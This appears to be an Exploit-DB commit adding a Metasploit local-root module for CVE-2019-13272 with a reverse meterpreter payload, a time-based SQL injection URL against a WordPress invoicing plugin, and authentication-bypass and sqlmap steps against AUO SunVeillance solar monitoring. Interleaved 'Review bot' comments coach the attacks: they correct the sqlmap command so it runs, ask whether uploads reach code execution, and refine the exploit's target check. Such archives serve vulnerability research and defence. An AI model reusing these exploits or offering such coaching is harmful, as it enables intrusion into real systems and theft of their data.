DB: 2019-10-25

4 changes to exploits/shellcodes
Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)
Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection
AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control
AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection
parent afafb6c641
commit 52e6461f47
5 changed files with 209 additions and 0 deletions
exploits/hardware/webapps/47541.txt (new file, 23 lines)
@ -0,0 +1,23 @@
# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control
# Date: 2019-10-24
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# CVE: N/A

# 1. Description:
# An issue was discovered in AUO SunVeillance Monitoring System.
# There is an incorrect access control vulnerability that can allow the attacker to
# bypass the authentication mechanism, and upload files to the server without any authentication.

# 2. Proof of Concept:
(1) Access the picture management page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/Picture_Manage_mvc.aspx) without
any authentication. As a guest role, user is not allowed to upload a picture. However, there are two parameters, Act and authority, in Picture_Manage_mvc.aspx.
(2) Modify the value of parameter authority from 40 to 100. You can find out the upload button is enabled.
(3) Now you can upload a file successfully.
(4) The file which we uploaded is storing in server side. It’s means any user without authentication can upload files to server side.

Thank you for your kind assistance.

Luca
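Review bot: the Version header ("all versions prior to v1.1.9e") contradicts the title, which names 1.1.9e itself as the vulnerable release; state which it is, and if the header is right the title should carry the last affected version, not the fixed one. Steps (1) to (3) of the PoC never show the request that is actually sent: include the GET/POST to /Solar_Web_Portal/Picture_Manage_mvc.aspx with Act and authority=100 as transmitted, so the entry is reproducible and the root cause is explicit, namely that the server gates the upload on a client-supplied authority value instead of the session's role. Step (4) should also say whether the stored file is reachable under the web root and which extensions are accepted, since that decides whether this is unauthenticated file storage or a path to code execution.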
exploits/hardware/webapps/47542.txt (new file, 31 lines)
@ -0,0 +1,31 @@
# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection
# Date: 2019-10-24
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# CVE: N/A

# 1. Description:
# AUO SunVeillance Monitoring System all versions prior to v1.1.9e that is vulnerable to SQL Injection.
# The vulnerability can allow the attacker inject maliciously SQL command to the server which allows
# the attacker to read privileged data.

# 2. Proof of Concept:

(1) Access the sending mail page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/mvc_send_mail.aspx) without any authentication.
There is a parameter, MailAdd, in mvc_send_mail.aspx.
(2) Modify the value of parameter MailAdd with single quotation. The error messages contains oracle database information.
(3) By using sqlmap tools, attacker can acquire the database list which in server side.

cmd: sqlmap.py -u “https://<host>/Solar_Web_Portal/mvc_send_mail.aspx?MailAdd=” -p MailAdd –dbs

(4) Furthermore, there are a few SQL Injection vulnerabilities in other fields.

picture_manage_mvc.aspx (parameter: plant_no)
swapdl_mvc.aspx (parameter: plant_no)
account_management.aspx (parameter: Text_Postal_Code, Text_Dis_Code)

Thank you for your kind assistance.

Luca
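Review bot: the sqlmap command in step (3) cannot be pasted as written: the URL is wrapped in curly quotes (“ ”) rather than ASCII double quotes, and --dbs has been flattened to –dbs (an en dash), so the shell passes the quote characters through as part of the argument and sqlmap rejects the option; it should read sqlmap.py -u "https://<host>/Solar_Web_Portal/mvc_send_mail.aspx?MailAdd=" -p MailAdd --dbs, and since step (2) already identifies the backend as Oracle, --dbms=oracle spares the fingerprinting run. The Version header has the same contradiction with the title as in 47541.txt (prior to v1.1.9e versus 1.1.9e itself), and step (4) lists three further injectable pages without a single request or payload for any of them, so those findings are unverifiable from this entry.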
exploits/linux/local/47543.rb (new executable file, 132 lines)
@ -0,0 +1,132 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::Kernel
include Msf::Post::Linux::System
include Msf::Post::Linux::Compile
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit',
'Description' => %q{
This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux
kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but
not over an SSH session, as it requires execution from within the context of
a user with an active Polkit agent.
In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles
the recording of the credentials of a process that wants to create a ptrace
relationship, which allows local users to obtain root access by leveraging
certain scenarios with a parent-child process relationship, where a parent drops
privileges and calls execve (potentially allowing control by an attacker). One
contributing factor is an object lifetime issue (which can also cause a panic).
Another contributing factor is incorrect marking of a ptrace relationship as
privileged, which is exploitable through (for example) Polkit's pkexec helper
with PTRACE_TRACEME.
},
'License' => MSF_LICENSE,
'Author' => [
'Jann Horn', # Discovery and exploit
'bcoles', # Metasploit module
'timwr', # Metasploit module
],
'References' => [
['CVE', '2019-13272'],
['EDB', '47133'],
['PACKETSTORM', '153663'],
['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'],
['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'],
],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X64 ],
'Targets' => [[ 'Auto', {} ]],
'DefaultOptions' =>
{
'Payload' => 'linux/x64/meterpreter/reverse_tcp',
'PrependFork' => true,
},
'DisclosureDate' => 'Jul 4 2019'))
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end

def check
# Introduced in 4.10, but also backported
# Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17
release = kernel_release
v = Gem::Version.new release.split('-').first

if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3')
vprint_error "Kernel version #{release} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Kernel version #{release} appears to be vulnerable"

unless command_exists? 'pkexec'
vprint_error 'pkexec is not installed'
return CheckCode::Safe
end
vprint_good 'pkexec is installed'

arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"

loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote')
if loginctl_output =~ /Remote=yes/
print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)'
return CheckCode::Safe
end

CheckCode::Appears
end

def exploit
if is_root? && !datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end

unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end

unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end

payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
upload_and_chmodx(payload_file, generate_payload_exe)
register_file_for_cleanup(payload_file)

exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c')
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit')
end
register_file_for_cleanup(exploit_file)

print_status("Executing exploit '#{exploit_file}'")
result = cmd_exec("echo #{payload_file} | #{exploit_file}")
print_status("Exploit result:\n#{result}")
end
end
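Review bot: check reports every kernel from 3 up to 5.1.16 as vulnerable, but the comment directly above the comparison says the fix was also backported to 4.4.185, 4.9.185, 4.14.133 and 4.19.58, so a patched stable kernel such as 4.19.58 or later still gets CheckCode::Appears and exploit runs against it; compare the release against the patched version of its own stable series (first two components of the version select the branch, then the Gem::Version comparison against that branch's fixed version) rather than against 5.1.17 alone. Two smaller points in the same hunk: the loginctl test only refuses when it sees Remote=yes, so a session with no XDG_SESSION_ID (a payload launched outside any login session) yields empty output and passes the check even though pkexec will find no Polkit agent, so an empty or missing Remote= line should be treated as unknown rather than as a pass; and the print_warning text reads 'This is exploit requires', which should be 'This exploit requires'.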
exploits/php/webapps/47540.txt (new file, 19 lines)
@ -0,0 +1,19 @@
# Exploit Title: Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection
# Date: 2019-10-22
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3

# 1. Description:
# Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected
# by an Authenticated SQL Injection vulnerability.

# 2. Proof of Concept:
# Authenticated SQL Injection:
- Using an Wordpress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.
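Review bot: the Description says versions lower than 3.8.2 are affected while the Version header and title name 3.8.2 itself; pick one, and if 3.8.2 is the fixed release say so explicitly. The PoC should state the lowest WordPress role for which the request works, since "Using an Wordpress user" leaves open whether a Subscriber account is enough or the duplicate_quote_invoice action checks a capability, and whether a nonce is verified, which decides whether the same request can be delivered cross-site. The time-based payload is fine as a proof; note that the closing comment depends on the trailing encoded space (--%20), so the URL must be pasted intact, and the header typo "Webiste" should be "Website".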
@ -10732,6 +10732,7 @@ id,file,description,date,author,type,platform,port
47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows,
47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows,
47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -41858,3 +41859,6 @@ id,file,description,date,author,type,platform,port
47524,exploits/php/webapps/47524.py,"Joomla! 3.4.6 - Remote Code Execution",2019-10-18,"Alessandro Groppo",webapps,php,
47537,exploits/linux/webapps/47537.txt,"Rocket.Chat 2.1.0 - Cross-Site Scripting",2019-10-23,3H34N,webapps,linux,
47539,exploits/php/webapps/47539.rb,"Joomla! 3.4.6 - Remote Code Execution (Metasploit)",2019-10-23,"Alessandro Groppo",webapps,php,
47540,exploits/php/webapps/47540.txt,"Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php,
47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware,
47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware,
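Review bot: the date column for 47540 is 2019-10-24 while the advisory header in exploits/php/webapps/47540.txt says 2019-10-22; the two AUO rows match their advisories (2019-10-24 in both places), so either the column records the publication date for all three and 47540 is fine, or it records the advisory date and 47540 should be 2019-10-22, but the index should not mix the two. The new rows also carry the advisory titles' version numbers (1.1.9e, 3.8.2) that the advisories' own Version and Description lines describe as the first fixed release, so the version ambiguity flagged in those files is now reproduced in the index.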